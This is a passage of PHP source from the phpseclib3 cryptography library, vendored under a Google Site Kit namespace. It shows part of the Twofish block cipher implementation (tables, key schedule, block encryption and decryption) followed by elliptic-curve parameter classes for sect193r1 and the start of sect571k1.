0x60784848, 0xff2ee5e5, 0x96074c4c, 0x5c4b6565, 0xb1c72b2b, 0xab6f8e8e, 0x9e0d4242, 0x9cbbf5f5, 0x52f2dbdb, 0x1bf34a4a, 0x5fa63d3d, 0x9359a4a4, 0xabcb9b9, 0xef3af9f9, 0x91ef1313, 0x85fe0808, 0x49019191, 0xee611616, 0x2d7cdede, 0x4fb22121, 0x8f42b1b1, 0x3bdb7272, 0x47b82f2f, 0x8748bfbf, 0x6d2caeae, 0x46e3c0c0, 0xd6573c3c, 0x3e859a9a, 0x6929a9a9, 0x647d4f4f, 0x2a948181, 0xce492e2e, 0xcb17c6c6, 0x2fca6969, 0xfcc3bdbd, 0x975ca3a3, 0x55ee8e8, 0x7ad0eded, 0xac87d1d1, 0x7f8e0505, 0xd5ba6464, 0x1aa8a5a5, 0x4bb72626, 0xeb9bebe, 0xa7608787, 0x5af8d5d5, 0x28223636, 0x14111b1b, 0x3fde7575, 0x2979d9d9, 0x88aaeeee, 0x3c332d2d, 0x4c5f7979, 0x2b6b7b7, 0xb896caca, 0xda583535, 0xb09cc4c4, 0x17fc4343, 0x551a8484, 0x1ff64d4d, 0x8a1c5959, 0x7d38b2b2, 0x57ac3333, 0xc718cfcf, 0x8df40606, 0x74695353, 0xb7749b9b, 0xc4f59797, 0x9f56adad, 0x72dae3e3, 0x7ed5eaea, 0x154af4f4, 0x229e8f8f, 0x12a2abab, 0x584e6262, 0x7e85f5f, 0x99e51d1d, 0x34392323, 0x6ec1f6f6, 0x50446c6c, 0xde5d3232, 0x68724646, 0x6526a0a0, 0xbc93cdcd, 0xdb03dada, 0xf8c6baba, 0xc8fa9e9e, 0xa882d6d6, 0x2bcf6e6e, 0x40507070, 0xdceb8585, 0xfe750a0a, 0x328a9393, 0xa48ddfdf, 0xca4c2929, 0x10141c1c, 0x2173d7d7, 0xf0ccb4b4, 0xd309d4d4, 0x5d108a8a, 0xfe25151, 0x0, 0x6f9a1919, 0x9de01a1a, 0x368f9494, 0x42e6c7c7, 0x4aecc9c9, 0x5efdd2d2, 0xc1ab7f7f, 0xe0d8a8a8]; /** * M-Table * * @var array */ private static $m2 = [0xbc75bc32, 0xecf3ec21, 0x20c62043, 0xb3f4b3c9, 0xdadbda03, 0x27b028b, 0xe2fbe22b, 0x9ec89efa, 0xc94ac9ec, 0xd4d3d409, 0x18e6186b, 0x1e6b1e9f, 0x9845980e, 0xb27db238, 0xa6e8a6d2, 0x264b26b7, 0x3cd63c57, 0x9332938a, 0x82d882ee, 0x52fd5298, 0x7b377bd4, 0xbb71bb37, 0x5bf15b97, 0x47e14783, 0x2430243c, 0x510f51e2, 0xbaf8bac6, 0x4a1b4af3, 0xbf87bf48, 0xdfa0d70, 0xb006b0b3, 0x753f75de, 0xd25ed2fd, 0x7dba7d20, 0x66ae6631, 0x3a5b3aa3, 0x598a591c, 0x0, 0xcdbccd93, 0x1a9d1ae0, 0xae6dae2c, 0x7fc17fab, 0x2bb12bc7, 0xbe0ebeb9, 0xe080e0a0, 0x8a5d8a10, 0x3bd23b52, 0x64d564ba, 0xd8a0d888, 0xe784e7a5, 0x5f075fe8, 0x1b141b11, 0x2cb52cc2, 0xfc90fcb4, 0x312c3127, 0x80a38065, 0x73b2732a, 0xc730c81, 0x794c795f, 0x6b546b41, 0x4b924b02, 0x53745369, 0x9436948f, 0x8351831f, 0x2a382a36, 0xc4b0c49c, 0x22bd22c8, 0xd55ad5f8, 0xbdfcbdc3, 0x48604878, 0xff62ffce, 0x4c964c07, 0x416c4177, 0xc742c7e6, 0xebf7eb24, 0x1c101c14, 0x5d7c5d63, 0x36283622, 0x672767c0, 0xe98ce9af, 0x441344f9, 0x149514ea, 0xf59cf5bb, 0xcfc7cf18, 0x3f243f2d, 0xc046c0e3, 0x723b72db, 0x5470546c, 0x29ca294c, 0xf0e3f035, 0x88508fe, 0xc6cbc617, 0xf311f34f, 0x8cd08ce4, 0xa493a459, 0xcab8ca96, 0x68a6683b, 0xb883b84d, 0x38203828, 0xe5ffe52e, 0xad9fad56, 0xb770b84, 0xc8c3c81d, 0x99cc99ff, 0x580358ed, 0x196f199a, 0xe080e0a, 0x95bf957e, 0x70407050, 0xf7e7f730, 0x6e2b6ecf, 0x1fe21f6e, 0xb579b53d, 0x90c090f, 0x61aa6134, 0x57825716, 0x9f419f0b, 0x9d3a9d80, 0x11ea1164, 0x25b925cd, 0xafe4afdd, 0x459a4508, 0xdfa4df8d, 0xa397a35c, 0xea7eead5, 0x35da3558, 0xed7aedd0, 0x431743fc, 0xf866f8cb, 0xfb94fbb1, 0x37a137d3, 0xfa1dfa40, 0xc23dc268, 0xb4f0b4cc, 0x32de325d, 0x9cb39c71, 0x560b56e7, 0xe372e3da, 0x87a78760, 0x151c151b, 0xf9eff93a, 0x63d163bf, 0x345334a9, 0x9a3e9a85, 0xb18fb142, 0x7c337cd1, 0x8826889b, 0x3d5f3da6, 0xa1eca1d7, 0xe476e4df, 0x812a8194, 0x91499101, 0xf810ffb, 0xee88eeaa, 0x16ee1661, 0xd721d773, 0x97c497f5, 0xa51aa5a8, 0xfeebfe3f, 0x6dd96db5, 0x78c578ae, 0xc539c56d, 0x1d991de5, 0x76cd76a4, 0x3ead3edc, 0xcb31cb67, 0xb68bb647, 0xef01ef5b, 0x1218121e, 0x602360c5, 0x6add6ab0, 0x4d1f4df6, 0xce4ecee9, 0xde2dde7c, 0x55f9559d, 0x7e487e5a, 0x214f21b2, 0x3f2037a, 0xa065a026, 0x5e8e5e19, 0x5a785a66, 0x655c654b, 0x6258624e, 0xfd19fd45, 0x68d06f4, 0x40e54086, 0xf298f2be, 0x335733ac, 0x17671790, 0x57f058e, 0xe805e85e, 0x4f644f7d, 0x89af896a, 0x10631095, 0x74b6742f, 0xafe0a75, 0x5cf55c92, 0x9bb79b74, 0x2d3c2d33, 0x30a530d6, 0x2ece2e49, 0x49e94989, 0x46684672, 0x77447755, 0xa8e0a8d8, 0x964d9604, 0x284328bd, 0xa969a929, 0xd929d979, 0x862e8691, 0xd1acd187, 0xf415f44a, 0x8d598d15, 0xd6a8d682, 0xb90ab9bc, 0x429e420d, 0xf66ef6c1, 0x2f472fb8, 0xdddfdd06, 0x23342339, 0xcc35cc62, 0xf16af1c4, 0xc1cfc112, 0x85dc85eb, 0x8f228f9e, 0x71c971a1, 0x90c090f0, 0xaa9baa53, 0x18901f1, 0x8bd48be1, 0x4eed4e8c, 0x8eab8e6f, 0xab12aba2, 0x6fa26f3e, 0xe60de654, 0xdb52dbf2, 0x92bb927b, 0xb702b7b6, 0x692f69ca, 0x39a939d9, 0xd3d7d30c, 0xa761a723, 0xa21ea2ad, 0xc3b4c399, 0x6c506c44, 0x7040705, 0x4f6047f, 0x27c22746, 0xac16aca7, 0xd025d076, 0x50865013, 0xdc56dcf7, 0x8455841a, 0xe109e151, 0x7abe7a25, 0x139113ef]; /** * M-Table * * @var array */ private static $m3 = [0xd939a9d9, 0x90176790, 0x719cb371, 0xd2a6e8d2, 0x5070405, 0x9852fd98, 0x6580a365, 0xdfe476df, 0x8459a08, 0x24b9202, 0xa0e080a0, 0x665a7866, 0xddafe4dd, 0xb06addb0, 0xbf63d1bf, 0x362a3836, 0x54e60d54, 0x4320c643, 0x62cc3562, 0xbef298be, 0x1e12181e, 0x24ebf724, 0xd7a1ecd7, 0x77416c77, 0xbd2843bd, 0x32bc7532, 0xd47b37d4, 0x9b88269b, 0x700dfa70, 0xf94413f9, 0xb1fb94b1, 0x5a7e485a, 0x7a03f27a, 0xe48cd0e4, 0x47b68b47, 0x3c24303c, 0xa5e784a5, 0x416b5441, 0x6dddf06, 0xc56023c5, 0x45fd1945, 0xa33a5ba3, 0x68c23d68, 0x158d5915, 0x21ecf321, 0x3166ae31, 0x3e6fa23e, 0x16578216, 0x95106395, 0x5bef015b, 0x4db8834d, 0x91862e91, 0xb56dd9b5, 0x1f83511f, 0x53aa9b53, 0x635d7c63, 0x3b68a63b, 0x3ffeeb3f, 0xd630a5d6, 0x257abe25, 0xa7ac16a7, 0xf090c0f, 0x35f0e335, 0x23a76123, 0xf090c0f0, 0xafe98caf, 0x809d3a80, 0x925cf592, 0x810c7381, 0x27312c27, 0x76d02576, 0xe7560be7, 0x7b92bb7b, 0xe9ce4ee9, 0xf10189f1, 0x9f1e6b9f, 0xa93453a9, 0xc4f16ac4, 0x99c3b499, 0x975bf197, 0x8347e183, 0x6b18e66b, 0xc822bdc8, 0xe98450e, 0x6e1fe26e, 0xc9b3f4c9, 0x2f74b62f, 0xcbf866cb, 0xff99ccff, 0xea1495ea, 0xed5803ed, 0xf7dc56f7, 0xe18bd4e1, 0x1b151c1b, 0xada21ead, 0xcd3d70c, 0x2be2fb2b, 0x1dc8c31d, 0x195e8e19, 0xc22cb5c2, 0x8949e989, 0x12c1cf12, 0x7e95bf7e, 0x207dba20, 0x6411ea64, 0x840b7784, 0x6dc5396d, 0x6a89af6a, 0xd17c33d1, 0xa171c9a1, 0xceff62ce, 0x37bb7137, 0xfb0f81fb, 0x3db5793d, 0x51e10951, 0xdc3eaddc, 0x2d3f242d, 0xa476cda4, 0x9d55f99d, 0xee82d8ee, 0x8640e586, 0xae78c5ae, 0xcd25b9cd, 0x4964d04, 0x55774455, 0xa0e080a, 0x13508613, 0x30f7e730, 0xd337a1d3, 0x40fa1d40, 0x3461aa34, 0x8c4eed8c, 0xb3b006b3, 0x6c54706c, 0x2a73b22a, 0x523bd252, 0xb9f410b, 0x8b027b8b, 0x88d8a088, 0x4ff3114f, 0x67cb3167, 0x4627c246, 0xc06727c0, 0xb4fc90b4, 0x28382028, 0x7f04f67f, 0x78486078, 0x2ee5ff2e, 0x74c9607, 0x4b655c4b, 0xc72bb1c7, 0x6f8eab6f, 0xd429e0d, 0xbbf59cbb, 0xf2db52f2, 0xf34a1bf3, 0xa63d5fa6, 0x59a49359, 0xbcb90abc, 0x3af9ef3a, 0xef1391ef, 0xfe0885fe, 0x1914901, 0x6116ee61, 0x7cde2d7c, 0xb2214fb2, 0x42b18f42, 0xdb723bdb, 0xb82f47b8, 0x48bf8748, 0x2cae6d2c, 0xe3c046e3, 0x573cd657, 0x859a3e85, 0x29a96929, 0x7d4f647d, 0x94812a94, 0x492ece49, 0x17c6cb17, 0xca692fca, 0xc3bdfcc3, 0x5ca3975c, 0x5ee8055e, 0xd0ed7ad0, 0x87d1ac87, 0x8e057f8e, 0xba64d5ba, 0xa8a51aa8, 0xb7264bb7, 0xb9be0eb9, 0x6087a760, 0xf8d55af8, 0x22362822, 0x111b1411, 0xde753fde, 0x79d92979, 0xaaee88aa, 0x332d3c33, 0x5f794c5f, 0xb6b702b6, 0x96cab896, 0x5835da58, 0x9cc4b09c, 0xfc4317fc, 0x1a84551a, 0xf64d1ff6, 0x1c598a1c, 0x38b27d38, 0xac3357ac, 0x18cfc718, 0xf4068df4, 0x69537469, 0x749bb774, 0xf597c4f5, 0x56ad9f56, 0xdae372da, 0xd5ea7ed5, 0x4af4154a, 0x9e8f229e, 0xa2ab12a2, 0x4e62584e, 0xe85f07e8, 0xe51d99e5, 0x39233439, 0xc1f66ec1, 0x446c5044, 0x5d32de5d, 0x72466872, 0x26a06526, 0x93cdbc93, 0x3dadb03, 0xc6baf8c6, 0xfa9ec8fa, 0x82d6a882, 0xcf6e2bcf, 0x50704050, 0xeb85dceb, 0x750afe75, 0x8a93328a, 0x8ddfa48d, 0x4c29ca4c, 0x141c1014, 0x73d72173, 0xccb4f0cc, 0x9d4d309, 0x108a5d10, 0xe2510fe2, 0x0, 0x9a196f9a, 0xe01a9de0, 0x8f94368f, 0xe6c742e6, 0xecc94aec, 0xfdd25efd, 0xab7fc1ab, 0xd8a8e0d8]; /** * The Key Schedule Array * * @var array */ private $K = []; /** * The Key depended S-Table 0 * * @var array */ private $S0 = []; /** * The Key depended S-Table 1 * * @var array */ private $S1 = []; /** * The Key depended S-Table 2 * * @var array */ private $S2 = []; /** * The Key depended S-Table 3 * * @var array */ private $S3 = []; /** * Holds the last used key * * @var array */ private $kl; /** * The Key Length (in bytes) * * @see Crypt_Twofish::setKeyLength() * @var int */ protected $key_length = 16; /** * Default Constructor. * * @param string $mode * @throws BadModeException if an invalid / unsupported mode is provided */ public function __construct($mode) { parent::__construct($mode); if ($this->mode == self::MODE_STREAM) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\BadModeException('Block ciphers cannot be ran in stream mode'); } } /** * Initialize Static Variables */ protected static function initialize_static_variables() { if (\is_float(self::$m3[0])) { self::$m0 = \array_map('intval', self::$m0); self::$m1 = \array_map('intval', self::$m1); self::$m2 = \array_map('intval', self::$m2); self::$m3 = \array_map('intval', self::$m3); self::$q0 = \array_map('intval', self::$q0); self::$q1 = \array_map('intval', self::$q1); } parent::initialize_static_variables(); } /** * Sets the key length. * * Valid key lengths are 128, 192 or 256 bits * * @param int $length */ public function setKeyLength($length) { switch ($length) { case 128: case 192: case 256: break; default: throw new \LengthException('Key of size ' . $length . ' not supported by this algorithm. Only keys of sizes 16, 24 or 32 supported'); } parent::setKeyLength($length); } /** * Sets the key. * * Rijndael supports five different key lengths * * @see setKeyLength() * @param string $key * @throws \LengthException if the key length isn't supported */ public function setKey($key) { switch (\strlen($key)) { case 16: case 24: case 32: break; default: throw new \LengthException('Key of size ' . \strlen($key) . ' not supported by this algorithm. Only keys of sizes 16, 24 or 32 supported'); } parent::setKey($key); } /** * Setup the key (expansion) * * @see \phpseclib3\Crypt\Common\SymmetricKey::_setupKey() */ protected function setupKey() { if (isset($this->kl['key']) && $this->key === $this->kl['key']) { // already expanded return; } $this->kl = ['key' => $this->key]; /* Key expanding and generating the key-depended s-boxes */ $le_longs = \unpack('V*', $this->key); $key = \unpack('C*', $this->key); $m0 = self::$m0; $m1 = self::$m1; $m2 = self::$m2; $m3 = self::$m3; $q0 = self::$q0; $q1 = self::$q1; $K = $S0 = $S1 = $S2 = $S3 = []; switch (\strlen($this->key)) { case 16: list($s7, $s6, $s5, $s4) = $this->mdsrem($le_longs[1], $le_longs[2]); list($s3, $s2, $s1, $s0) = $this->mdsrem($le_longs[3], $le_longs[4]); for ($i = 0, $j = 1; $i < 40; $i += 2, $j += 2) { $A = $m0[$q0[$q0[$i] ^ $key[9]] ^ $key[1]] ^ $m1[$q0[$q1[$i] ^ $key[10]] ^ $key[2]] ^ $m2[$q1[$q0[$i] ^ $key[11]] ^ $key[3]] ^ $m3[$q1[$q1[$i] ^ $key[12]] ^ $key[4]]; $B = $m0[$q0[$q0[$j] ^ $key[13]] ^ $key[5]] ^ $m1[$q0[$q1[$j] ^ $key[14]] ^ $key[6]] ^ $m2[$q1[$q0[$j] ^ $key[15]] ^ $key[7]] ^ $m3[$q1[$q1[$j] ^ $key[16]] ^ $key[8]]; $B = $B << 8 | $B >> 24 & 0xff; $A = self::safe_intval($A + $B); $K[] = $A; $A = self::safe_intval($A + $B); $K[] = $A << 9 | $A >> 23 & 0x1ff; } for ($i = 0; $i < 256; ++$i) { $S0[$i] = $m0[$q0[$q0[$i] ^ $s4] ^ $s0]; $S1[$i] = $m1[$q0[$q1[$i] ^ $s5] ^ $s1]; $S2[$i] = $m2[$q1[$q0[$i] ^ $s6] ^ $s2]; $S3[$i] = $m3[$q1[$q1[$i] ^ $s7] ^ $s3]; } break; case 24: list($sb, $sa, $s9, $s8) = $this->mdsrem($le_longs[1], $le_longs[2]); list($s7, $s6, $s5, $s4) = $this->mdsrem($le_longs[3], $le_longs[4]); list($s3, $s2, $s1, $s0) = $this->mdsrem($le_longs[5], $le_longs[6]); for ($i = 0, $j = 1; $i < 40; $i += 2, $j += 2) { $A = $m0[$q0[$q0[$q1[$i] ^ $key[17]] ^ $key[9]] ^ $key[1]] ^ $m1[$q0[$q1[$q1[$i] ^ $key[18]] ^ $key[10]] ^ $key[2]] ^ $m2[$q1[$q0[$q0[$i] ^ $key[19]] ^ $key[11]] ^ $key[3]] ^ $m3[$q1[$q1[$q0[$i] ^ $key[20]] ^ $key[12]] ^ $key[4]]; $B = $m0[$q0[$q0[$q1[$j] ^ $key[21]] ^ $key[13]] ^ $key[5]] ^ $m1[$q0[$q1[$q1[$j] ^ $key[22]] ^ $key[14]] ^ $key[6]] ^ $m2[$q1[$q0[$q0[$j] ^ $key[23]] ^ $key[15]] ^ $key[7]] ^ $m3[$q1[$q1[$q0[$j] ^ $key[24]] ^ $key[16]] ^ $key[8]]; $B = $B << 8 | $B >> 24 & 0xff; $A = self::safe_intval($A + $B); $K[] = $A; $A = self::safe_intval($A + $B); $K[] = $A << 9 | $A >> 23 & 0x1ff; } for ($i = 0; $i < 256; ++$i) { $S0[$i] = $m0[$q0[$q0[$q1[$i] ^ $s8] ^ $s4] ^ $s0]; $S1[$i] = $m1[$q0[$q1[$q1[$i] ^ $s9] ^ $s5] ^ $s1]; $S2[$i] = $m2[$q1[$q0[$q0[$i] ^ $sa] ^ $s6] ^ $s2]; $S3[$i] = $m3[$q1[$q1[$q0[$i] ^ $sb] ^ $s7] ^ $s3]; } break; default: // 32 list($sf, $se, $sd, $sc) = $this->mdsrem($le_longs[1], $le_longs[2]); list($sb, $sa, $s9, $s8) = $this->mdsrem($le_longs[3], $le_longs[4]); list($s7, $s6, $s5, $s4) = $this->mdsrem($le_longs[5], $le_longs[6]); list($s3, $s2, $s1, $s0) = $this->mdsrem($le_longs[7], $le_longs[8]); for ($i = 0, $j = 1; $i < 40; $i += 2, $j += 2) { $A = $m0[$q0[$q0[$q1[$q1[$i] ^ $key[25]] ^ $key[17]] ^ $key[9]] ^ $key[1]] ^ $m1[$q0[$q1[$q1[$q0[$i] ^ $key[26]] ^ $key[18]] ^ $key[10]] ^ $key[2]] ^ $m2[$q1[$q0[$q0[$q0[$i] ^ $key[27]] ^ $key[19]] ^ $key[11]] ^ $key[3]] ^ $m3[$q1[$q1[$q0[$q1[$i] ^ $key[28]] ^ $key[20]] ^ $key[12]] ^ $key[4]]; $B = $m0[$q0[$q0[$q1[$q1[$j] ^ $key[29]] ^ $key[21]] ^ $key[13]] ^ $key[5]] ^ $m1[$q0[$q1[$q1[$q0[$j] ^ $key[30]] ^ $key[22]] ^ $key[14]] ^ $key[6]] ^ $m2[$q1[$q0[$q0[$q0[$j] ^ $key[31]] ^ $key[23]] ^ $key[15]] ^ $key[7]] ^ $m3[$q1[$q1[$q0[$q1[$j] ^ $key[32]] ^ $key[24]] ^ $key[16]] ^ $key[8]]; $B = $B << 8 | $B >> 24 & 0xff; $A = self::safe_intval($A + $B); $K[] = $A; $A = self::safe_intval($A + $B); $K[] = $A << 9 | $A >> 23 & 0x1ff; } for ($i = 0; $i < 256; ++$i) { $S0[$i] = $m0[$q0[$q0[$q1[$q1[$i] ^ $sc] ^ $s8] ^ $s4] ^ $s0]; $S1[$i] = $m1[$q0[$q1[$q1[$q0[$i] ^ $sd] ^ $s9] ^ $s5] ^ $s1]; $S2[$i] = $m2[$q1[$q0[$q0[$q0[$i] ^ $se] ^ $sa] ^ $s6] ^ $s2]; $S3[$i] = $m3[$q1[$q1[$q0[$q1[$i] ^ $sf] ^ $sb] ^ $s7] ^ $s3]; } } $this->K = $K; $this->S0 = $S0; $this->S1 = $S1; $this->S2 = $S2; $this->S3 = $S3; } /** * _mdsrem function using by the twofish cipher algorithm * * @param string $A * @param string $B * @return array */ private function mdsrem($A, $B) { // No gain by unrolling this loop. for ($i = 0; $i < 8; ++$i) { // Get most significant coefficient. $t = 0xff & $B >> 24; // Shift the others up. $B = $B << 8 | 0xff & $A >> 24; $A <<= 8; $u = $t << 1; // Subtract the modular polynomial on overflow. if ($t & 0x80) { $u ^= 0x14d; } // Remove t * (a * x^2 + 1). $B ^= $t ^ $u << 16; // Form u = a*t + t/a = t*(a + 1/a). $u ^= 0x7fffffff & $t >> 1; // Add the modular polynomial on underflow. if ($t & 0x1) { $u ^= 0xa6; } // Remove t * (a + 1/a) * (x^3 + x). $B ^= $u << 24 | $u << 8; } return [0xff & $B >> 24, 0xff & $B >> 16, 0xff & $B >> 8, 0xff & $B]; } /** * Encrypts a block * * @param string $in * @return string */ protected function encryptBlock($in) { $S0 = $this->S0; $S1 = $this->S1; $S2 = $this->S2; $S3 = $this->S3; $K = $this->K; $in = \unpack("V4", $in); $R0 = $K[0] ^ $in[1]; $R1 = $K[1] ^ $in[2]; $R2 = $K[2] ^ $in[3]; $R3 = $K[3] ^ $in[4]; $ki = 7; while ($ki < 39) { $t0 = $S0[$R0 & 0xff] ^ $S1[$R0 >> 8 & 0xff] ^ $S2[$R0 >> 16 & 0xff] ^ $S3[$R0 >> 24 & 0xff]; $t1 = $S0[$R1 >> 24 & 0xff] ^ $S1[$R1 & 0xff] ^ $S2[$R1 >> 8 & 0xff] ^ $S3[$R1 >> 16 & 0xff]; $R2 ^= self::safe_intval($t0 + $t1 + $K[++$ki]); $R2 = $R2 >> 1 & 0x7fffffff | $R2 << 31; $R3 = ($R3 >> 31 & 1 | $R3 << 1) ^ self::safe_intval($t0 + ($t1 << 1) + $K[++$ki]); $t0 = $S0[$R2 & 0xff] ^ $S1[$R2 >> 8 & 0xff] ^ $S2[$R2 >> 16 & 0xff] ^ $S3[$R2 >> 24 & 0xff]; $t1 = $S0[$R3 >> 24 & 0xff] ^ $S1[$R3 & 0xff] ^ $S2[$R3 >> 8 & 0xff] ^ $S3[$R3 >> 16 & 0xff]; $R0 ^= self::safe_intval($t0 + $t1 + $K[++$ki]); $R0 = $R0 >> 1 & 0x7fffffff | $R0 << 31; $R1 = ($R1 >> 31 & 1 | $R1 << 1) ^ self::safe_intval($t0 + ($t1 << 1) + $K[++$ki]); } // @codingStandardsIgnoreStart return \pack("V4", $K[4] ^ $R2, $K[5] ^ $R3, $K[6] ^ $R0, $K[7] ^ $R1); // @codingStandardsIgnoreEnd } /** * Decrypts a block * * @param string $in * @return string */ protected function decryptBlock($in) { $S0 = $this->S0; $S1 = $this->S1; $S2 = $this->S2; $S3 = $this->S3; $K = $this->K; $in = \unpack("V4", $in); $R0 = $K[4] ^ $in[1]; $R1 = $K[5] ^ $in[2]; $R2 = $K[6] ^ $in[3]; $R3 = $K[7] ^ $in[4]; $ki = 40; while ($ki > 8) { $t0 = $S0[$R0 & 0xff] ^ $S1[$R0 >> 8 & 0xff] ^ $S2[$R0 >> 16 & 0xff] ^ $S3[$R0 >> 24 & 0xff]; $t1 = $S0[$R1 >> 24 & 0xff] ^ $S1[$R1 & 0xff] ^ $S2[$R1 >> 8 & 0xff] ^ $S3[$R1 >> 16 & 0xff]; $R3 ^= self::safe_intval($t0 + ($t1 << 1) + $K[--$ki]); $R3 = $R3 >> 1 & 0x7fffffff | $R3 << 31; $R2 = ($R2 >> 31 & 0x1 | $R2 << 1) ^ self::safe_intval($t0 + $t1 + $K[--$ki]); $t0 = $S0[$R2 & 0xff] ^ $S1[$R2 >> 8 & 0xff] ^ $S2[$R2 >> 16 & 0xff] ^ $S3[$R2 >> 24 & 0xff]; $t1 = $S0[$R3 >> 24 & 0xff] ^ $S1[$R3 & 0xff] ^ $S2[$R3 >> 8 & 0xff] ^ $S3[$R3 >> 16 & 0xff]; $R1 ^= self::safe_intval($t0 + ($t1 << 1) + $K[--$ki]); $R1 = $R1 >> 1 & 0x7fffffff | $R1 << 31; $R0 = ($R0 >> 31 & 0x1 | $R0 << 1) ^ self::safe_intval($t0 + $t1 + $K[--$ki]); } // @codingStandardsIgnoreStart return \pack("V4", $K[0] ^ $R2, $K[1] ^ $R3, $K[2] ^ $R0, $K[3] ^ $R1); // @codingStandardsIgnoreEnd } /** * Setup the performance-optimized function for de/encrypt() * * @see \phpseclib3\Crypt\Common\SymmetricKey::_setupInlineCrypt() */ protected function setupInlineCrypt() { $K = $this->K; $init_crypt = ' static $S0, $S1, $S2, $S3; if (!$S0) { for ($i = 0; $i < 256; ++$i) { $S0[] = (int)$this->S0[$i]; $S1[] = (int)$this->S1[$i]; $S2[] = (int)$this->S2[$i]; $S3[] = (int)$this->S3[$i]; } } '; $safeint = self::safe_intval_inline(); // Generating encrypt code: $encrypt_block = ' $in = unpack("V4", $in); $R0 = ' . $K[0] . ' ^ $in[1]; $R1 = ' . $K[1] . ' ^ $in[2]; $R2 = ' . $K[2] . ' ^ $in[3]; $R3 = ' . $K[3] . ' ^ $in[4]; '; for ($ki = 7, $i = 0; $i < 8; ++$i) { $encrypt_block .= ' $t0 = $S0[ $R0 & 0xff] ^ $S1[($R0 >> 8) & 0xff] ^ $S2[($R0 >> 16) & 0xff] ^ $S3[($R0 >> 24) & 0xff]; $t1 = $S0[($R1 >> 24) & 0xff] ^ $S1[ $R1 & 0xff] ^ $S2[($R1 >> 8) & 0xff] ^ $S3[($R1 >> 16) & 0xff]; $R2^= ' . \sprintf($safeint, '$t0 + $t1 + ' . $K[++$ki]) . '; $R2 = ($R2 >> 1 & 0x7fffffff) | ($R2 << 31); $R3 = ((($R3 >> 31) & 1) | ($R3 << 1)) ^ ' . \sprintf($safeint, '($t0 + ($t1 << 1) + ' . $K[++$ki] . ')') . '; $t0 = $S0[ $R2 & 0xff] ^ $S1[($R2 >> 8) & 0xff] ^ $S2[($R2 >> 16) & 0xff] ^ $S3[($R2 >> 24) & 0xff]; $t1 = $S0[($R3 >> 24) & 0xff] ^ $S1[ $R3 & 0xff] ^ $S2[($R3 >> 8) & 0xff] ^ $S3[($R3 >> 16) & 0xff]; $R0^= ' . \sprintf($safeint, '($t0 + $t1 + ' . $K[++$ki] . ')') . '; $R0 = ($R0 >> 1 & 0x7fffffff) | ($R0 << 31); $R1 = ((($R1 >> 31) & 1) | ($R1 << 1)) ^ ' . \sprintf($safeint, '($t0 + ($t1 << 1) + ' . $K[++$ki] . ')') . '; '; } $encrypt_block .= ' $in = pack("V4", ' . $K[4] . ' ^ $R2, ' . $K[5] . ' ^ $R3, ' . $K[6] . ' ^ $R0, ' . $K[7] . ' ^ $R1); '; // Generating decrypt code: $decrypt_block = ' $in = unpack("V4", $in); $R0 = ' . $K[4] . ' ^ $in[1]; $R1 = ' . $K[5] . ' ^ $in[2]; $R2 = ' . $K[6] . ' ^ $in[3]; $R3 = ' . $K[7] . ' ^ $in[4]; '; for ($ki = 40, $i = 0; $i < 8; ++$i) { $decrypt_block .= ' $t0 = $S0[$R0 & 0xff] ^ $S1[$R0 >> 8 & 0xff] ^ $S2[$R0 >> 16 & 0xff] ^ $S3[$R0 >> 24 & 0xff]; $t1 = $S0[$R1 >> 24 & 0xff] ^ $S1[$R1 & 0xff] ^ $S2[$R1 >> 8 & 0xff] ^ $S3[$R1 >> 16 & 0xff]; $R3^= ' . \sprintf($safeint, '$t0 + ($t1 << 1) + ' . $K[--$ki]) . '; $R3 = $R3 >> 1 & 0x7fffffff | $R3 << 31; $R2 = ($R2 >> 31 & 0x1 | $R2 << 1) ^ ' . \sprintf($safeint, '($t0 + $t1 + ' . $K[--$ki] . ')') . '; $t0 = $S0[$R2 & 0xff] ^ $S1[$R2 >> 8 & 0xff] ^ $S2[$R2 >> 16 & 0xff] ^ $S3[$R2 >> 24 & 0xff]; $t1 = $S0[$R3 >> 24 & 0xff] ^ $S1[$R3 & 0xff] ^ $S2[$R3 >> 8 & 0xff] ^ $S3[$R3 >> 16 & 0xff]; $R1^= ' . \sprintf($safeint, '$t0 + ($t1 << 1) + ' . $K[--$ki]) . '; $R1 = $R1 >> 1 & 0x7fffffff | $R1 << 31; $R0 = ($R0 >> 31 & 0x1 | $R0 << 1) ^ ' . \sprintf($safeint, '($t0 + $t1 + ' . $K[--$ki] . ')') . '; '; } $decrypt_block .= ' $in = pack("V4", ' . $K[0] . ' ^ $R2, ' . $K[1] . ' ^ $R3, ' . $K[2] . ' ^ $R0, ' . $K[3] . ' ^ $R1); '; $this->inline_crypt = $this->createInlineCryptFunction(['init_crypt' => $init_crypt, 'init_encrypt' => '', 'init_decrypt' => '', 'encrypt_block' => $encrypt_block, 'decrypt_block' => $decrypt_block]); } } <?php /** * sect193r1 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Binary; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class sect193r1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Binary { public function __construct() { $this->setModulo(193, 15, 0); $this->setCoefficients('0017858FEB7A98975169E171F77B4087DE098AC8A911DF7B01', '00FDFB49BFE6C3A89FACADAA7A1E5BBC7CC1C2E5D831478814'); $this->setBasePoint('01F481BC5F0FF84A74AD6CDF6FDEF4BF6179625372D8C0C5E1', '0025E399F2903712CCF3EA9E3A1AD17FB0B3201B6AF7CE1B05'); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('01000000000000000000000000C7F34A778F443ACC920EBA49', 16)); } } <?php /** * sect571k1 * * PHP version 5 and 7 * * @author Jim Wiggint on <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Binary; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class sect571k1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Binary { public function __construct() { $this->setModulo(571, 10, 5, 2, 0); $this->setCoefficients('000000000000000000000000000000000000000000000000000000000000000000000000' . 